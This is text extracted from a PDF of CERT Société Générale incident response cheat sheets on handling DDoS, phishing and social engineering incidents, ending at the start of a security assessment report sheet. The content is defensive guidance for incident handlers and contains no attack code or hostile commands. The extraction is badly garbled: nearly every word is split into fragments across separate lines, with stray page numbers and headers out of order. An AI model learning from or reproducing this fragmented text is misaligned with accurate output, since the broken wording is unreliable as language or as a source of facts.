rver
, etc
.)
If po
ssib
le, r
oute
traf
fic th
roug
h a
traffi
c-sc
rubb
ing
serv
ice
or
prod
uct v
ia D
NS
or r
outin
g ch
ange
s (e
.g.:
sink
hole
rout
ing)
Con
figur
e eg
ress
filt
ers
to b
lock
the
tra
ffic
your
sys
tem
s m
ay s
end
in re
spon
se to
DD
oS tr
affic
(e.g
.: ba
cksq
uatte
r tra
ffic)
, to
avo
id a
ddin
g un
nece
ssar
y pa
cket
s to
the
netw
ork.
In c
ase
of a
n ex
torti
on a
ttem
pt,
try t
o bu
y tim
e w
ith t
he
fraud
ster
. Fo
r ex
ampl
e, e
xpla
in t
hat
you
need
mor
e tim
e in
or
der t
o ge
t man
agem
ent a
ppro
val.
If th
e bo
ttlen
eck
is a
t th
e IS
P’s
side
, on
ly t
he
ISP
can
take
effi
cien
t act
ions
. In
that
cas
e, w
ork
clos
ely
with
you
r IS
P an
d m
ake
sure
you
sha
re
info
rmat
ion
effic
ient
ly.
1122
33
94108
Rem
edia
tion
Rec
over
y
Afte
rmat
h
In
cide
nt R
espo
nse
Met
hodo
logy
IRM
#4
D
DoS
inci
dent
resp
onse
G
uide
lines
to h
andl
e D
istri
bute
d D
enia
l of S
ervi
ce in
cide
nts
____
____
____
____
____
____
____
____
____
____
____
____
___
IRM
Aut
hor:
CE
RT
SG
/ V
ince
nt F
erra
n-La
com
e IR
M v
ersi
on: 1
.3
E
-Mai
l: ce
rt.sg
@so
cgen
.com
W
eb: h
ttp://
cert.
soci
eteg
ener
ale.
com
Tw
itter
: @C
ertS
G
Abs
trac
t
Inci
dent
han
dlin
g st
eps
This
Inci
dent
Res
pons
e M
etho
dolo
gy is
a c
heat
she
et d
edic
ated
to
han
dler
s in
vest
igat
ing
on a
pre
cise
sec
urity
issu
e.
Who
sho
uld
use
IRM
she
ets?
Adm
inis
trato
rs
S
ecur
ity O
pera
tion
Cen
ter
C
ISO
s an
d de
putie
s
CE
RTs
(Com
pute
r Em
erge
ncy
Res
pons
e Te
am)
Rem
embe
r: If
you
fac
e an
inci
dent
, fol
low
IRM
, tak
e no
tes
and
do
not
pani
c.
Con
tact
yo
ur
CER
T im
med
iate
ly
if ne
eded
.
6 st
eps
are
defin
ed to
han
dle
secu
rity
Inci
dent
s
P
repa
ratio
n: g
et re
ady
to h
andl
e th
e in
cide
nt
Id
entif
icat
ion:
det
ect t
he in
cide
nt
C
onta
inm
ent:
limit
the
impa
ct o
f the
inci
dent
Rem
edia
tion:
rem
ove
the
thre
at
R
ecov
ery:
reco
ver t
o a
norm
al s
tage
Afte
rmat
h: d
raw
up
and
impr
ove
the
proc
ess
IR
M p
rovi
des
deta
iled
info
rmat
ion
for e
ach
step
.
Th
is d
ocum
ent i
s fo
r pub
lic u
se
Obj
ectiv
e:
Doc
umen
t th
e in
cide
nt’s
de
tails
, di
scus
s le
sson
s le
arne
d, a
nd a
djus
t pl
ans
and
defe
nces
.
Con
side
r w
hat
prep
arat
ion
step
s yo
u co
uld
have
tak
en t
o re
spon
d to
the
inc
iden
t fa
ster
or
mor
e ef
fect
ivel
y.
I
f ne
cess
ary,
adj
ust
assu
mpt
ions
tha
t af
fect
ed
the
deci
sion
s m
ade
durin
g D
DoS
in
cide
nt
prep
arat
ion.
A
sses
s th
e ef
fect
iven
ess
of
your
D
DoS
re
spon
se
proc
ess,
in
volv
ing
peop
le
and
com
mun
icat
ions
.
C
onsi
der
wha
t re
latio
nshi
ps in
side
and
out
side
yo
ur
orga
niza
tions
co
uld
help
yo
u w
ith
futu
re
inci
dent
s.
C
olla
bora
te w
ith le
gal t
eam
s if
a le
gal a
ctio
n is
in
pro
cess
.
66
Obj
ectiv
e:
Com
e ba
ck
to
the
prev
ious
fu
nctio
nal s
tate
. A
sses
s th
e en
d of
the
DD
oS c
ondi
tion
E
nsur
e th
at
the
impa
cted
se
rvic
es
are
reac
habl
e ag
ain.
E
nsur
e th
at y
our
infra
stru
ctur
e pe
rform
ance
is
back
to y
our b
asel
ine
perfo
rman
ce.
Rol
lbac
k th
e m
itiga
tion
mea
sure
s
Sw
itch
back
traf
fic to
you
r orig
inal
net
wor
k.
R
esta
rt st
oppe
d se
rvic
es.
Ensu
re t
hat
the
reco
very
-rel
ated
act
ions
are
de
cide
d in
acc
orda
nce
with
the
netw
ork
team
s.
Brin
ging
up
serv
ices
cou
ld h
ave
unex
pect
ed
side
effe
cts.
55
Obj
ectiv
e: T
ake
actio
ns t
o st
op t
he D
enia
l of
Se
rvic
e co
nditi
on.
C
onta
ct y
our I
SP
and
mak
e su
re th
at it
enf
orce
s re
med
iatio
n m
easu
res.
For
inf
orm
atio
n, h
ere
are
som
e of
the
poss
ible
mea
sure
s:
- Fi
lterin
g (if
pos
sibl
e at
leve
l Tie
r1 o
r 2)
- Tr
affic
-scr
ubbi
ng/S
inkh
ole/
Cle
an-p
ipe
- B
lack
hole
Rou
ting
I
f th
e D
DoS
sp
onso
rs h
ave
been
id
entif
ied,
co
nsid
er
invo
lvin
g la
w
enfo
rcem
ent.
This
sho
uld
be p
erfo
rmed
upo
n th
e di
rect
ion
of
your
com
pany
’s e
xecu
tive
and
lega
l tea
ms.
Te
chni
cal
rem
edia
tion
actio
ns c
an m
ostly
be
enfo
rced
by
your
ISP.
44
95109
Prep
arat
ion
Iden
tific
atio
n
Con
tain
men
t Pr
epar
atio
n
Obj
ectiv
e: E
stab
lish
cont
acts
, def
ine
proc
edur
es,
gath
er in
form
atio
n to
sav
e tim
e du
ring
an a
ttack
.
C
reat
e a
list
of
all
legi
timat
e do
mai
ns
belo
ngin
g to
yo
ur
com
pany
. Th
is w
ill h
elp
anal
ysin
g th
e si
tuat
ion,
and
pre
vent
you
fro
m s
tarti
ng a
tak
edow
n pr
oced
ure
on a
for
gotte
n le
gitim
ate
web
site
.
Pre
pare
one
web
pag
e ho
sted
on
your
infra
stru
ctur
e, r
eady
to
be p
ublis
hed
anyt
ime,
to
war
n yo
ur c
usto
mer
s ab
out
an o
ngoi
ng
phis
hing
atta
ck. P
repa
re a
nd te
st a
cle
ar d
eplo
ymen
t pro
cedu
re a
s w
ell. P
repa
re t
aked
own
e-m
ail f
orm
s. Y
ou w
ill u
se t
hem
for
eve
ry
phis
hing
cas
e, if
pos
sibl
e in
sev
eral
lang
uage
s. T
his
will
spe
ed u
p th
ings
whe
n try
ing
to r
each
the
hos
ting
com
pany
etc
. du
ring
the
take
dow
n pr
oces
s.
Inte
rnal
con
tact
s
Mai
ntai
n a
list
of
all
peop
le
invo
lved
in
do
mai
n na
mes
re
gist
ratio
n in
the
com
pany
.
M
aint
ain
a lis
t of
all
peop
le a
ccre
dite
d to
tak
e de
cisi
ons
on
cybe
rcrim
e an
d ev
entu
al a
ctio
ns r
egar
ding
phi
shin
g. I
f po
ssib
le,
have
a c
ontra
ct m
entio
ning
you
can
take
dec
isio
ns.
Exte
rnal
con
tact
s
Hav
e se
vera
l way
s to
be
reac
hed
in a
tim
ely
man
ner
(24/
7 if
poss
ible
):
- E
-Mai
l ad
dres
s, e
asy
to r
emem
ber
for
ever
yone
(ex
: se
curit
y@yo
urco
mpa
ny)
- W
eb f
orm
s on
you
r co
mpa
ny’s
web
site
(lo
catio
n of
the
fo
rm is
impo
rtant
, no
mor
e th
an 2
clic
ks a
way
fro
m t
he
mai
n pa
ge)
- V
isib
le T
witt
er a
ccou
nt
E
stab
lish
and
mai
ntai
n a
list o
f tak
edow
n co
ntac
ts in
:
- H
ostin
g co
mpa
nies
- R
egis
try c
ompa
nies
- E
-Mai
l pro
vide
rs
Est
ablis
h an
d m
aint
ain
cont
acts
in C
ER
Ts w
orld
wid
e, th
ey w
ill
prob
ably
alw
ays
be a
ble
to h
elp
if ne
eded
. R
aise
cus
tom
er a
war
enes
s D
on’t
wai
t fo
r ph
ishi
ng
inci
dent
s to
co
mm
unic
ate
with
yo
ur
cust
omer
s. R
aise
aw
aren
ess
abou
t ph
ishi
ng f
raud
, ex
plai
n w
hat
phis
hing
is a
nd m
ake
sure
you
r cu
stom
ers
know
you
won
’t ev
er
ask
them
for
cre
dent
ials
/ban
king
info
rmat
ion
by e
-mai
l or
on t
he
phon
e.
Obj
ectiv
e: D
etec
t th
e in
cide
nt,
dete
rmin
e its
sc
ope,
and
invo
lve
the
appr
opria
te p
artie
s.
Phis
hing
Det
ectio
n
Mon
itor a
ll yo
ur p
oint
s of
con
tact
clo
sely
(e-m
ail,
web
form
s,
etc.
)
D
eplo
y sp
am
traps
an
d try
to
ga
ther
sp
am
from
pa
rtner
s/th
ird-p
artie
s.
D
eplo
y ac
tive
mon
itorin
g of
ph
ishi
ng
repo
sito
ries,
lik
e A
A41
9 or
Phi
shTa
nk fo
r exa
mpl
e.
M
onito
r any
spe
cial
ised
mai
ling-
list y
ou c
an h
ave
acce
ss to
, or
any
RS
S/T
witt
er f
eed,
whi
ch c
ould
be
repo
rting
phi
shin
g ca
ses.
Use
aut
omat
ed m
onito
ring
syst
ems
on a
ll of
thes
e so
urce
s, s
o th
at e
very
det
ectio
n tri
gger
s an
ala
rm fo
r ins
tant
reac
tion.
M
onito
r you
r web
logs
. Che
ck th
ere
is n
o su
spic
ious
refe
rrer
br
ingi
ng p
eopl
e to
you
r web
site
. Thi
s is
ofte
n th
e ca
se w
hen
the
phis
hing
web
site
s br
ings
the
user
to th
e le
gitim
ate
web
site
afte
r he
’s b
een
chea
ted.
Invo
lve
appr
opria
te p
artie
s A
s so
on a
s a
phis
hing
web
site
is d
etec
ted,
con
tact
the
peop
le in
yo
ur c
ompa
ny w
ho a
re a
ccre
dite
d to
take
a d
ecis
ion,
if n
ot y
ou.
The
deci
sion
to
act
on t
he f
raud
ulen
t w
ebsi
te/e
-mai
l ad
dres
s m
ust b
e ta
ken
as s
oon
as p
ossi
ble,
with
in m
inut
es.
Col
lect
evi
denc
e M
ake
a tim
e-st
ampe
d co
py o
f the
phi
shin
g w
eb p
ages
. Use
an
effic
ient
tool
to d
o th
at, l
ike
HTT
rack
for e
xam
ple.
Don
’t fo
rget
to
take
eve
ry p
age
of th
e ph
ishi
ng s
chem
e, n
ot ju
st th
e fir
st o
ne if
th
ere
are
seve
ral.
If ne
eded
, tak
e sc
reen
shot
s of
the
page
s.
Obj
ectiv
e: M
itiga
te t
he a
ttack
’s e
ffect
s on
the
ta
rget
ed e
nviro
nmen
t.
S
prea
d th
e U
RL
of th
e at
tack
in c
ase
of a
phi
shin
g w
ebsi
te.
Use
eve
ry w
ay y
ou h
ave
to s
prea
d th
e fra
udul
ent
UR
L on
ev
ery
web
bro
wse
r: us
e th
e op
tions
of
Inte
rnet
Exp
lore
r, C
hrom
e, S
afar
i, Fi
refo
x, N
etcr
aft t
oolb
ar, P
hish
ing-
Initi
ativ
e,
etc.
This
will
pre
vent
the
user
s fro
m a
cces
sing
the
web
site
whi
le
you
wor
k on
the
rem
edia
tion
phas
e.
S
prea
d th
e fra
udul
ent
e-m
ail
cont
ent
on s
pam
-rep
ortin
g w
ebsi
tes/
partn
ers.
C
omm
unic
ate
with
you
r cus
tom
ers.
Dep
loy
the
aler
t/war
ning
pag
e w
ith in
form
atio
n ab
out t
he c
urre
nt
phis
hing
atta
ck.
In c
ase
you
are
impa
cted
sev
eral
tim
es a
wee
k, d
on’t
alw
ays
depl
oy a
n al
ert/w
arni
ng m
essa
ge b
ut r
athe
r a
very
info
rmat
ive
phis
hing
pag
e to
rais
e aw
aren
ess.
Che
ck th
e so
urce
-cod
e of
the
phis
hing
web
site
.
- S
ee w
here
the
data
is e
xpor
ted:
eith
er to
ano
ther
web
co
nten
t yo
u ca
nnot
acc
ess
(a P
HP
scr
ipt
usua
lly),
or
sent
by
e-m
ail t
o th
e fra
udst
er.
- W
atch
how
the
phis
hing
-pag
e is
bui
lt. D
o th
e gr
aphi
cs
com
e fro
m o
ne o
f you
r le
gitim
ate
web
site
, or
are
they
st
ored
loca
lly?
If po
ssib
le, i
n ca
se th
e gr
aphi
cs a
re ta
ken
from
one
of
your
ow
n w
ebsi
tes,
you
cou
ld c
hang
e th
e gr
aphi
cs t
o di
spla
y a
“PH
ISH
ING
W
EB
SIT
E”
logo
on
th
e fra
udst
er’s
pag
e.
11
22
33 11
Rai
se b
usin
ess
line
awar
enes
s P
eopl
e in
bus
ines
s lin
es m
ust
be a
war
e of
phi
shin
g pr
oble
ms
and
cons
ider
sec
urity
as
a pr
iorit
y. T
here
fore
, the
y sh
ould
app
ly
good
pra
ctic
es s
uch
as a
void
sen
ding
link
s (U
RL)
to c
usto
mer
s,
and
use
a si
gnat
ure
stat
ing
that
the
com
pany
will
nev
er a
sk
them
for c
rede
ntia
l/ban
king
info
rmat
ion
onlin
e.
96110
Rem
edia
tion
Rec
over
y
Afte
rmat
h
In
cide
nt R
espo
nse
Met
hodo
logy
IRM
#13
Phis
hing
inci
dent
resp
onse
G
uide
lines
to h
andl
e ph
ishi
ng in
cide
nts
____
____
____
____
____
____
____
____
____
____
____
____
___
IRM
Aut
hor:
CE
RT
SG
/ C
edric
PE
RN
ET
IRM
ver
sion
: 1.0
E-M
ail:
cert.
sg@
socg
en.c
om
Web
: http
://ce
rt.so
ciet
egen
eral
e.co
m
Twitt
er: @
Cer
tSG
Abs
trac
t
Inci
dent
han
dlin
g st
eps
Obj
ectiv
e: T
ake
actio
ns to
sto
p th
e fr
aud.
In
cas
e th
e fra
udul
ent
phis
hing
pag
es a
re h
oste
d on
a
com
prom
ised
w
ebsi
te,
try
to
cont
act
the
owne
r of
th
e w
ebsi
te.
Exp
lain
cle
arly
the
fra
ud t
o th
e ow
ner,
so t
hat
he
take
s ap
prop
riate
act
ions
: re
mov
e th
e fra
udul
ent
cont
ent,
and
mos
t of
all
upgr
ade
the
secu
rity
on i
t, so
tha
t th
e fra
udst
er c
anno
t com
e ba
ck u
sing
the
sam
e vu
lner
abili
ty.
In
any
cas
e, a
lso
cont
act
the
host
ing
com
pany
of
the
web
site
. S
end
e-m
ails
to
the
cont
act
addr
esse
s of
the
ho
stin
g co
mpa
ny
(gen
eral
ly
ther
e is
an
ab
use@
host
ingc
ompa
ny)
then
try
to
get
som
eone
on
the
phon
e, to
spe
ed th
ings
up.
C
onta
ct
the
e-m
ail
host
ing
com
pany
to
sh
ut
dow
n th
e fra
udul
ent a
ccou
nts
whi
ch r
ecei
ve th
e st
olen
cre
dent
ials
or
cred
it ca
rd in
form
atio
n (E
ither
on
an “
e-m
ail o
nly”
phi
shin
g ca
se
or
on
a us
ual
one,
if
you
man
aged
to
ge
t th
e de
stin
atio
n e-
mai
l add
ress
).
In
cas
e th
ere
is a
redi
rect
ion
(the
link
cont
aine
d in
the
e-m
ail
ofte
n go
es
to
a re
dire
ctin
g U
RL)
al
so
take
do
wn
the
redi
rect
ion
by c
onta
ctin
g th
e co
mpa
ny r
espo
nsib
le f
or t
he
serv
ice.
In c
ase
you
get n
o an
swer
, or
no a
ctio
n is
take
n, d
on’t
hesi
tate
to
cal
l ba
ck a
nd s
end
e-m
ails
on
a re
gula
r ba
sis,
eve
ry t
wo
hour
s fo
r exa
mpl
e.
If
the
take
dow
n is
too
slo
w,
cont
act
a lo
cal
CE
RT
in t
he
invo
lved
cou
ntry
, whi
ch c
ould
hel
p ta
king
dow
n th
e fra
ud.
Obj
ectiv
e:
Com
e ba
ck
to
the
prev
ious
fu
nctio
nal s
tate
. A
sses
s th
e en
d of
the
phis
hing
cas
e
Ens
ure
that
the
fraud
ulen
t pag
es a
nd/o
r e-
mai
l add
ress
are
do
wn.
K
eep
mon
itorin
g th
e fra
udul
ent U
RL.
Som
etim
es a
phi
shin
g w
ebsi
te c
an r
eapp
ear
som
e ho
urs
late
r. In
cas
e a
redi
rect
ion
is
used
and
not
take
n do
wn,
mon
itor i
t ver
y cl
osel
y.
A
t the
end
of
a ph
ishi
ng c
ampa
ign,
rem
ove
the
asso
ciat
ed
war
ning
pag
e fro
m y
our w
ebsi
te.
Obj
ectiv
e:
Doc
umen
t th
e in
cide
nt’s
de
tails
, di
scus
s le
sson
s le
arne
d, a
nd a
djus
t pl
ans
and
defe
nces
.
C
onsi
der
wha
t pr
epar
atio
n st
eps
you
coul
d ha
ve t
aken
to
resp
ond
to th
e in
cide
nt fa
ster
or m
ore
effic
ient
ly.
U
pdat
e yo
ur c
onta
cts-
lists
and
add
not
es a
s to
wha
t is
the
mos
t effe
ctiv
e w
ay to
con
tact
eac
h in
volv
ed p
arty
.
C
onsi
der
wha
t re
latio
nshi
ps
insi
de
and
outs
ide
your
or
gani
zatio
n co
uld
help
you
with
futu
re in
cide
nts.
C
olla
bora
te w
ith le
gal t
eam
s if
a le
gal a
ctio
n is
requ
ired.
This
Inci
dent
Res
pons
e M
etho
dolo
gy is
a c
heat
she
et d
edic
ated
to
han
dler
s in
vest
igat
ing
on a
pre
cise
sec
urity
issu
e.
Who
sho
uld
use
IRM
she
ets?
•
Adm
inis
trato
rs
• S
ecur
ity O
pera
tion
Cen
ter
• C
ISO
s an
d de
putie
s •
CE
RTs
(Com
pute
r Em
erge
ncy
Res
pons
e Te
am)
Rem
embe
r: If
you
fac
e an
inci
dent
, fol
low
IRM
, tak
e no
tes
and
do
not
pani
c.
Con
tact
yo
ur
CER
T im
med
iate
ly
if ne
eded
.
6 st
eps
are
defin
ed to
han
dle
secu
rity
Inci
dent
s
Pre
para
tion:
get
read
y to
han
dle
the
inci
dent
Id
entif
icat
ion:
det
ect t
he in
cide
nt
Con
tain
men
t: lim
it th
e im
pact
of t
he in
cide
nt
Rem
edia
tion:
rem
ove
the
thre
at
Rec
over
y: re
cove
r to
a no
rmal
sta
ge
Afte
rmat
h: d
raw
up
and
impr
ove
the
proc
ess
IR
M p
rovi
des
deta
iled
info
rmat
ion
for e
ach
step
.
Th
is d
ocum
ent i
s fo
r pub
lic u
se
4455 66
97111
Prep
arat
ion
Iden
tific
atio
n C
onta
inm
ent
Obj
ectiv
e:
Esta
blis
h co
ntac
ts,
defin
e pr
oced
ures
, an
d ga
ther
in
form
atio
n to
sa
ve
time
durin
g an
inci
dent
. ■■
Rai
se u
ser a
war
enes
s an
d se
curit
y po
licie
s
Nev
er g
ive
any
pers
onal
or c
orpo
rate
info
rmat
ion
to
an u
nide
ntifi
ed p
erso
n. T
his
coul
d in
clud
e us
er ID
s,
pass
wor
ds,
acco
unt
info
rmat
ion,
na
me,
e-
mai
l ad
dres
s,
phon
e (m
obile
or
la
ndlin
e)
num
bers
, ad
dres
s,
soci
al
secu
rity
num
ber,
job
title
s,
info
rmat
ion
on c
lient
s, o
rgan
izat
ion
or IT
sys
tem
s.
The
goal
of
the
soci
al e
ngin
eer
is t
o st
eal
hum
an
reso
urce
s, c
orpo
rate
sec
rets
or c
usto
mer
/use
r dat
a.
Rep
ort
any
susp
icio
us e
vent
to
your
man
ager
, w
ho w
ill fo
rwar
d it
to th
e C
ISO
in o
rder
to h
ave
a ce
ntra
lized
repo
rtin
g.
■■ H
ave
a de
fined
pro
cess
to
redi
rect
any
“w
eird
” re
ques
t to
a “re
d” p
hone
, if n
eede
d.
Red
ph
one
num
ber
mus
t be
cl
early
ta
gged
as
“S
ocia
l E
ngin
eerin
g”.
The
phon
e nu
mbe
r ha
s to
be
eas
y to
iden
tify
in th
e gl
obal
pho
ne d
irect
ory
of
your
co
mpa
ny
but
requ
ests
on
re
vers
e nu
mbe
r sho
uld
not b
e di
spla
yed.
R
ed p
hone
lin
e sh
ould
alw
ays
be r
ecor
ded
for
evid
ence
col
lect
ing
purp
oses
. ■■
Prep
are
to
hand
le
conv
ersa
tion
with
so
cial
en
gine
ers
to i
dent
ify w
hich
inf
orm
atio
n co
uld
help
tra
ckin
g th
e at
tack
er a
nd h
is g
oals
. ■■
Che
ck y
our
lega
l dep
artm
ent
to s
ee w
hich
act
ions
ar
e al
low
ed a
nd w
hich
reac
tions
they
can
han
dle.
Obj
ectiv
e: D
etec
t th
e in
cide
nt,
dete
rmin
e its
sc
ope,
and
invo
lve
the
appr
opria
te p
artie
s.
■■ Ph
one
call
/ so
meo
ne
you
don'
t kn
ow
calls
yo
u/yo
ur s
ervi
ce, a
skin
g fo
r det
aile
d in
form
atio
n.
If
the
cont
act
wor
ks
out
of
the
com
pany
an
d re
ques
ts fo
r inf
orm
atio
n th
at c
ould
be
valu
able
for a
co
mpe
titor
, den
y hi
s re
ques
ts a
nd g
o to
par
t 3.
If t
he c
onta
ct p
rete
nds
to b
e an
em
ploy
ee o
f yo
ur
com
pany
but
the
pho
ne n
umbe
r is
hid
den
or n
ot
inte
rnal
, pro
pose
that
you
cal
l bac
k to
the
decl
ared
nu
mbe
r in
the
dire
ctor
y. I
f th
e su
ppos
edly
atta
cker
ag
rees
, cal
l bac
k to
che
ck. I
f he
reje
cts
this
opt
ion,
go
to p
art 3
. Th
e at
tack
er m
ight
use
sev
eral
tec
hniq
ues
to e
ntic
e hi
s vi
ctim
to
sp
eak
(fear
, cu
riosi
ty,
empa
thy
...).
Do
not
disc
lose
info
rmat
ion
in a
ny c
ase.
Li
sten
car
eful
ly t
o hi
s re
ques
ts a
nd a
t th
e en
d as
k fo
r a
phon
e nu
mbe
r to
call
back
or a
n em
ail a
ddre
ss to
repl
y.
Take
not
es a
nd s
tay
calm
, eve
n if
the
atta
cker
is s
hout
ing
or
thre
aten
ing,
re
mem
ber
he
tries
to
us
e hu
man
w
eakn
esse
s.
If yo
u ca
n go
fur
ther
, th
e fo
llow
ing
info
rmat
ion
will
be
prec
ious
: -
the
nam
e of
the
corr
espo
nden
t, -
requ
este
d in
form
atio
n / p
eopl
e -
acce
nt, l
angu
age
skill
s,
- in
dust
ry la
ngua
ge a
nd o
rgan
izat
iona
l kno
wle
dge,
-
back
grou
nd n
oise
s -
time
and
dura
tion
of th
e ca
ll
■■ E-
mai
l / S
omeo
ne y
ou d
on't
know
requ
ests
det
aile
d in
form
atio
n.
If t
he c
onta
ct h
as a
n “o
ut o
f th
e co
mpa
ny”
e-m
ail
addr
ess
and
requ
ests
inf
orm
atio
n th
at c
ould
be
valu
able
for a
com
petit
or, g
o to
par
t 3.
If th
e co
ntac
t use
s an
inte
rnal
e-m
ail a
ddre
ss b
ut is
as
king
fo
r w
eird
in
form
atio
n,
ask
him
so
me
expl
anat
ions
and
use
the
com
pany
dire
ctor
y to
get
hi
s m
anag
er's
nam
e th
at y
ou'll
plac
e as
a c
opy.
■■ E
vent
ually
not
ify t
op m
anag
emen
t to
inf
orm
the
m
that
an
inci
dent
has
bee
n en
coun
tere
d re
latin
g to
a
soci
al e
ngin
eerin
g at
tack
. Th
ey m
ight
und
erst
and
the
goal
s de
pend
ing
on th
e co
ntex
t.
12
Obj
ectiv
e: M
itiga
te t
he a
ttack
’s e
ffect
s on
the
ta
rget
ed e
nviro
nmen
t. A
t th
is s
tep,
you
sho
uld
be p
retty
sur
e th
at y
ou're
de
alin
g w
ith a
soc
ial e
ngin
eerin
g at
tack
. A
ctio
ns fo
r all
empl
oyee
s:
■■ Ph
one
call
If t
he a
ttack
er u
rges
you
to
give
a p
hone
num
ber,
follo
w th
ese
step
s:
Use
th
e “re
d ph
one
line”
fro
m
your
C
ER
T/C
SIR
T, if
exi
stin
g.
Giv
e hi
m th
e nu
mbe
r with
an
inve
nted
nam
e.
Im
med
iate
ly
call
your
C
ER
T/C
SIR
T te
am
expl
aini
ng
wha
t ha
ppen
ed
and
the
chos
en
inve
nted
nam
e.
If th
e at
tack
er s
tress
es y
ou to
o m
uch
and
does
not
le
t you
tim
e to
find
the
Red
Pho
ne n
umbe
r, as
k hi
m
to c
all y
ou b
ack
late
r, pr
eten
ding
a m
eetin
g.
If t
he a
ttack
er
wan
ts t
o re
ach
som
eone
, fo
llow
th
ese
poin
ts :
Pla
ce
on
hold
th
e at
tack
er
and
call
CER
T/C
SIR
T te
am
and
expl
ain
wha
t ha
ppen
ed
Tra
nsfe
r th
e co
nver
satio
n of
the
atta
cker
to
CE
RT/
CS
IRT
team
(d
o no
t gi
ve
him
th
e nu
mbe
r) ■■
E-m
ail
For
war
d to
you
r se
curit
y te
am a
ll em
ail
incl
udin
g he
ader
s (s
end
as
atta
ched
do
cum
ents
) fo
r in
vest
igat
ion
purp
oses
. It
mig
ht h
elp
to t
rack
the
at
tack
er.
3
Use
r par
t
Use
r par
t
98112
Rec
over
y
Afte
rmat
h
In
cide
nt R
espo
nse
Met
hodo
logy
IRM
#10
So
cial
Eng
inee
ring
Inci
dent
H
ow to
han
dle
a so
cial
eng
inee
ring
inci
dent
(pho
ne o
r e-m
ail)
__
____
____
____
____
____
____
____
____
____
____
____
____
_ IR
M A
utho
r: C
ER
T S
G T
eam
IR
M v
ersi
on: 1
.0
E-M
ail:
cert.
sg@
socg
en.c
om
Web
: http
://ce
rt.so
ciet
egen
eral
e.co
m
Twitt
er: @
Cer
tSG
Abs
trac
t
Inci
dent
han
dlin
g st
eps
Con
tain
men
t
Rem
edia
tion
Obj
ectiv
e: T
ake
actio
ns t
o re
mov
e th
e th
reat
an
d av
oid
futu
re in
cide
nts.
S
ome
poss
ible
rem
edia
tion
actio
ns c
an b
e tri
ed:
■■ A
lert
the
law
enf
orce
men
t and
/or f
ile a
com
plai
nt,
■■ D
iscu
ss th
e pr
oble
m in
circ
les
of tr
ust t
o kn
ow if
the
com
pany
is fa
cing
this
issu
e al
one,
■■ Th
reat
en th
e at
tack
er w
ith le
gal a
ctio
ns if
he
can
be
iden
tifie
d
Obj
ectiv
e:
Res
tore
th
e sy
stem
to
no
rmal
op
erat
ions
.
Not
ify t
he t
op m
anag
emen
t of
the
act
ions
and
the
de
cisi
ons
take
n on
the
soci
al e
ngin
eerin
g ca
se.
Obj
ectiv
e:
Doc
umen
t th
e in
cide
nt’s
de
tails
, di
scus
s le
sson
s le
arne
d, a
nd a
djus
t pl
ans
and
defe
nces
. In
form
you
r hie
rarc
hy a
nd s
ubsi
diar
ies
abou
t the
in
cide
nt, t
his
coul
d he
lp to
avo
id s
imila
r atta
cks
late
r.
Rep
ort
An
inci
dent
rep
ort
shou
ld b
e w
ritte
n an
d m
ade
avai
labl
e to
all
the
acto
rs o
f the
inci
dent
. Th
e fo
llow
ing
them
es s
houl
d be
des
crib
ed:
■■ In
itial
det
ectio
n ■■
Act
ions
and
tim
elin
es
■■ W
hat w
ent r
ight
■■
Wha
t wen
t wro
ng
■■ In
cide
nt c
ost (
dire
ct a
nd in
dire
ct lo
sses
) C
apita
lize
Act
ions
to im
prov
e th
e so
cial
eng
inee
ring
hand
ling
proc
esse
s sh
ould
be
defin
ed t
o ca
pita
lize
on t
his
expe
rienc
e, s
peci
ally
aw
aren
ess.
This
Inci
dent
Res
pons
e M
etho
dolo
gy is
a c
heat
she
et d
edic
ated
to
han
dler
s in
vest
igat
ing
on a
pre
cise
sec
urity
issu
e.
Who
sho
uld
use
IRM
she
ets?
•
Adm
inis
trato
rs
• S
ecur
ity O
pera
tion
Cen
ter
• C
ISO
s an
d de
putie
s •
CE
RTs
(Com
pute
r Em
erge
ncy
Res
pons
e Te
am)
Rem
embe
r: If
you
fac
e an
inci
dent
, fol
low
IRM
, tak
e no
tes
and
do
not
pani
c.
Con
tact
yo
ur
CER
T im
med
iate
ly
if ne
eded
.
6 st
eps
are
defin
ed to
han
dle
secu
rity
Inci
dent
s
P
repa
ratio
n: g
et re
ady
to h
andl
e th
e in
cide
nt
Iden
tific
atio
n: d
etec
t the
inci
dent
C
onta
inm
ent:
limit
the
impa
ct o
f the
inci
dent
R
emed
iatio
n: re
mov
e th
e th
reat
R
ecov
ery:
reco
ver t
o a
norm
al s
tage
A
fterm
ath:
dra
w u
p an
d im
prov
e th
e pr
oces
s IR
M p
rovi
des
deta
iled
info
rmat
ion
for e
ach
step
.
This
doc
umen
t is
publ
ic u
se
5 6
Act
ions
for C
ERT
or in
cide
nt re
spon
se te
am:
■■ Ph
one
call
Res
ume
the
conv
ersa
tion
with
the
atta
cker
and
use
on
e of
thes
e te
chni
ques
: I
mpe
rson
ate
the
iden
tity
of t
he p
eopl
e w
hom
th
e at
tack
er is
will
ing
to s
peak
S
low
dow
n an
d m
ake
last
the
con
vers
atio
n an
d en
tice
the
atta
cker
to m
ake
mis
take
. E
xpla
in h
im t
hat
soci
al e
ngin
eerin
g at
tack
is
forb
idde
n by
law
, pu
nish
ed b
y sa
nctio
ns a
nd
that
law
yer
team
will
han
dle
the
issu
e if
it co
ntin
ues
If th
e tra
p ph
one
num
ber h
as b
een
used
, pre
pare
to
“bur
n it”
, cr
eate
ano
ther
one
and
dis
play
it
in t
he
dire
ctor
y.
■■ E-
mai
l
Col
lect
as
muc
h in
form
atio
n as
pos
sibl
e on
the
em
ail a
ddre
ss:
Ana
lyze
the
emai
l hea
ders
and
try
to lo
cate
the
sour
ce
Sea
rch
the
e-m
ail a
ddre
ss w
ith In
tern
et to
ols
Geo
loca
lize
the
user
beh
ind
the
emai
l add
ress
■■
Agg
rega
te a
ll so
cial
eng
inee
ring
atta
cks
to v
isua
lize
the
sche
me.
3 4
99113
TIP
S F
OR
CR
EA
TIN
G A
N I
NF
OR
MA
TIO
N
SE
CU
RIT
Y A
SS
ES
SM
EN
T R
EP
OR
T
Th
is c
he
at
she
et
pre
sen
ts r
eco
mm
en
da
tio
ns
for
cre
ati
ng
a s
tro
ng
re
po
rt a
s p
art
of
an
in
form
ati
on
secu
rity
ass
ess
me
nt
pro
ject
.
Ge
ne
ral
Ap
pro
ac
h t
o C
rea
tin
g t
he
Re
po
rt
1.
An
aly
ze t
he
da
ta c
oll
ect
ed
du
rin
g t
he
se
curi
ty
ass
ess
me
nt
to i
de
nti
fy r
ele
va
nt
issu
es.
2.
Pri
ori
tize
yo
ur
risk
s a
nd
ob
serv
ati
on
s; f
orm
ula
te
rem
ed
iati
on
ste
ps.
3.
Do
